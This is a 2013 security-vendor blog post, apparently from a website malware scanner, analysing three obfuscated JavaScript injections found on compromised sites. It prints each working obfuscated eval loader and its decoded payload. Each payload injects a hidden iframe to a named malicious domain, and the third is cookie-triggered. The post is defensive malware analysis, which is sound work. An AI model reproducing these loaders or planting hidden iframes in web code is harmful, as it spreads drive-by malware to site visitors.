Monday, October 21, 2013

Top 3 JavaScript Malware Threats From Last Week

Obfuscated malicious JavaScript code snippets that were detected on scanned websites

Background

Online Website Malware Scanner processes thousands of websites weekly to identify those who contain suspicious code under the legitimate web content. Detected malware is dumped and included in site scan malware report. Database of the scanned domains is publicly available and you can review malware report per each of them. For this post we selected several recent examples to be present to you because of their obfuscation and maliciousness level.

To manually review websites listing:
Clean domains
Potentially Suspicious domains
Suspicious domains
Malicious domains

For statistics on website malware detection and severity levels:
Last day 
Last week
Last month


Sample 1 


Detected hidden iframe automatically injected by malicious code. Iframe downloads content from the blacklisted domain that have already infected 29 other domains as per Google Safe Browsing report.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).


Malware details


Beautified script

  1. asq = function () {
  2.     returnn[i];
  3. };
  4. ww = window;
  5. ss = String["fro" + "mC" + "harC" + "o" + "de"];
  6. try {
  7.     document.body = ~1
  8. } catch (dgsgsdg) {
  9.     zz = 12 * 2 + 1 + 1;
  10.     whwej = 12;
  11. }
  12. if (whwej) {
  13.     try {} catch (agdsg) {
  14.         whwej = 0;
  15.     }
  16.     try {
  17.         document.body--;
  18.     } catch (bawetawe) {
  19.         if (ww.document) {
  20.             n ="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x76,0x69,0x65,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x68,0x6d,0x70,0x63,0x62,0x6d,0x77,0x66,0x6f,0x75,0x76,0x73,0x66,0x64,0x70,0x6f,0x74,0x70,0x73,0x75,0x6a,0x76,0x6e,0x2f,0x64,0x70,0x2f,0x76,0x6c,0x30,0x60,0x64,0x70,0x6f,0x75,0x66,0x6f,0x75,0x30,0x64,0x6f,0x75,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x76,0x69,0x65,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x76,0x69,0x65,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x76,0x69,0x65,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x76,0x69,0x65,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");
  21.             h = 2;
  22.             s = "";
  23.             if (whwej) {
  24.                 for (= 0; i - 491 != 0; i++) {
  25.                     k = i;
  26.                     s = s.concat(ss(eval(asq()) - 1));
  27.                 }
  28.                 eval(s);
  29.             }
  30.         }
  31.     }
  32. }


Malicious payload


Decoded payload injects hidden iframe to http://globalventureconsortium.co.uk/_content/cnt.php

  1. (function () {
  2.     var uhd = document.createElement('iframe');
  3.     uhd.src = 'http://globalventureconsortium.co.uk/_content/cnt.php';
  4.     uhd.style.position = 'absolute';
  5.     uhd.style.border = '0';
  6.     uhd.style.height = '1px';
  7.     uhd.style.width = '1px';
  8.     uhd.style.left = '1px';
  9.     uhd.style.top = '1px';
  10.     if (!document.getElementById('uhd')) {
  11.         document.write('<div id=\'uhd\'></div>');
  12.         document.getElementById('uhd').appendChild(uhd);
  13.     }
  14. })();

Blacklisting status


The website is Suspicious on Google Safe Browsing.


Google Safe Browsing diagnostic




Sample 2


Detected hidden iframe automatically injected by malicious code. Iframe downloads content from the blacklisted domain that have already infected 10 other domains as per Google Safe Browsing report.

Malicious action


Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Malware details

Beautified script


  1. asq = function () {
  2.     returnn[i];
  3. };
  4. ww = window;
  5. ss = String["fro" + "mC" + "harC" + "o" + "de"];
  6. try {
  7.     document.body = ~1
  8. } catch (dgsgsdg) {
  9.     zz = 12 * 2 + 1 + 1;
  10.     whwej = 12;
  11. }
  12. if (whwej) {
  13.     try {} catch (agdsg) {
  14.         whwej = 0;
  15.     }
  16.     try {
  17.         document.body--;
  18.     } catch (bawetawe) {
  19.         if (ww.document) {
  20.             n ="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x77,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x70,0x6d,0x76,0x6f,0x77,0x66,0x68,0x2f,0x73,0x76,0x30,0x64,0x70,0x76,0x6f,0x75,0x32,0x34,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x66,0x77,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x66,0x77,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x66,0x77,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x66,0x77,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");
  21.             h = 2;
  22.             s = "";
  23.             if (whwej) {
  24.                 for (= 0; i - 456 != 0; i++) {
  25.                     k = i;
  26.                     s = s.concat(ss(eval(asq()) - 1));
  27.                 }
  28.                 eval(s);
  29.             }
  30.         }
  31.     }
  32. }

Malicious payload



Decoded payload injects hidden iframe to http://colunveg.ru/count13.php


  1. (function () {
  2.     var ev = document.createElement('iframe');
  3.     ev.src = 'http://colunveg.ru/count13.php';
  4.     ev.style.position = 'absolute';
  5.     ev.style.border = '0';
  6.     ev.style.height = '1px';
  7.     ev.style.width = '1px';
  8.     ev.style.left = '1px';
  9.     ev.style.top = '1px';
  10.     if (!document.getElementById('ev')) {
  11.         document.write('<div id=\'ev\'></div>');
  12.         document.getElementById('ev').appendChild(ev);
  13.     }
  14. })();

Blacklisting status

The website is Suspicious on Google Safe Browsing.


Google Safe Browsing diagnostic

Sample 3

Detected hidden iframe automatically injected by malicious code. Iframe downloads content from the domain that was used to download malware to visitors PC, including 1 vulnerability exploit as per Google Safe Browsing report. 
Malware payload is triggered by cookies. The method is known as "cookie-bomb attack".

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).


Malware details

Beautified script


  1. gznx = "s" + "p" + "li" + "t";
  2. gqveq = window;
  3. ymn = "dy";
  4. qkayz = document;
  5. gvglsm = "0x";
  6. gku = (5 - 3 - 1);
  7. try {
  8.     ++(qkayz.body)
  9. } catch (atwgx) {
  10.     fvyb = false;
  11.     try {} catch (tcwi) {
  12.         fvyb = 21;
  13.     }
  14.     if (1) {
  15.         ddi ="17:5d:6c:65:5a:6b:60:66:65:17:69:70:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:69:70:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:69:70:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:50:4d:46:45:43:3c:3d:3c:39:4d:49:3c:25:3a:46:44:26:65:64:45:4e:3e:61:2b:6d:25:67:5f:67:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:30:27:2b:27:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:30:27:2b:27:67:6f:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:30:27:2b:27:67:6f:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:30:27:2b:27:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:30:27:2b:27:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:69:70:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:69:70:53:1e:17:5a:63:58:6a:6a:34:53:1e:69:70:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:69:70:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:69:70:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:69:70:27:30:1f:20:32:4:1:74:4:1:74"[gznx](":");
  16.     }
  17.     gqveq = ddi;
  18.     wuicko = [];
  19.     for (omvgs = 22 - 20 - 2; - omvgs + 1385 != 0; omvgs += 1) {
  20.         hev = omvgs;
  21.         if ((0x19 == 031)) wuicko += String["fromCharCode"](eval(gvglsm + gqveq[1 * hev]) + 0xa - gku);
  22.     }
  23.     alert(wuicko);
  24. }

Malicious payload


Decoded payload injects hidden iframe to http://YVONLEFEBVRE.COM/nmNWGj4v.php

  1. function ry09() {
  2.     var static = 'ajax';
  3.     var controller = 'index.php';
  4.     var ry = document.createElement('iframe');
  5.     ry.src = 'http://YVONLEFEBVRE.COM/nmNWGj4v.php';
  6.     ry.style.position = 'absolute';
  7.     ry.style.color = '9040';
  8.     ry.style.height = '9040px';
  9.     ry.style.width = '9040px';
  10.     ry.style.left = '10009040';
  11.     ry.style.top = '10009040';
  12.     if (!document.getElementById('ry')) {
  13.         document.write('<p id=\'ry\' class=\'ry09\' ></p>');
  14.         document.getElementById('ry').appendChild(ry);
  15.     }
  16. }
  17. function SetCookie(cookieName, cookieValue, nDays, path) {
  18.     var today = new Date();
  19.     var expire = new Date();
  20.     if (nDays == null || nDays == 0) nDays = 1;
  21.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  22.     document.cookie = cookieName + "=" + escape(cookieValue)
  23.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  24. }
  25. function GetCookie(name) {
  26.     var start = document.cookie.indexOf(name + "=");
  27.     var len = start + name.length + 1;
  28.     if ((!start) &&
  29.         (name != document.cookie.substring(0, name.length)))
  30.     {
  31.         return null;
  32.     }
  33.     if (start == -1) return null;
  34.     var end = document.cookie.indexOf(";", len);
  35.     if (end == -1) end = document.cookie.length;
  36.     return unescape(document.cookie.substring(len, end));
  37. }
  38. if (navigator.cookieEnabled)
  39. {
  40.     if (GetCookie('visited_uq') == 55) {} else {
  41.         SetCookie('visited_uq', '55', '1', '/');
  42.         ry09();
  43.     }
  44. }

Blacklisting status

Currently, the website is not suspicious on Google Safe Browsing. But was listed twice over the past 90 days.

Google Safe Browsing diagnostic


Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.

Alternatively, you can try to remove malware using Quttera's website scan report. You will then need to submit your website(s) for re-testing and removing from blacklist.